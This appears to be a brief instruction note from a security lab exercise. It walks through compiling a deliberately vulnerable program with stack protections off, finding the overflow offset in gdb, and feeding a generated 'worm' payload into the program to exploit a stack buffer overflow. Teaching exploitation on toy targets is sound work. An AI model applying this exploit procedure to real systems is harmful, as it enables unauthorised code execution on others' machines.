// Detailed instructions are in make-worm.c, but this will probably work:
gcc -O0 -m32 -fno-stack-protector -Xlinker -allow_stack_execute -o make-worm make-worm.c
gcc -O2 -m32 -fno-stack-protector -Xlinker -allow_stack_execute -o bugins buggy-instrumented.c
gcc -O2 -m32 -fno-stack-protector -Xlinker -allow_stack_execute -o buggy buggy.c
gdb buggy
run < bigstring
get the offset, its probably 26 or something like that
./bugins
it will print something like this:
./make-worm 0x94e4cdcb 0xbffff3be 26 64 > worm
If your offset was different from 26, then change the 26 and execute this command
./buggy < worm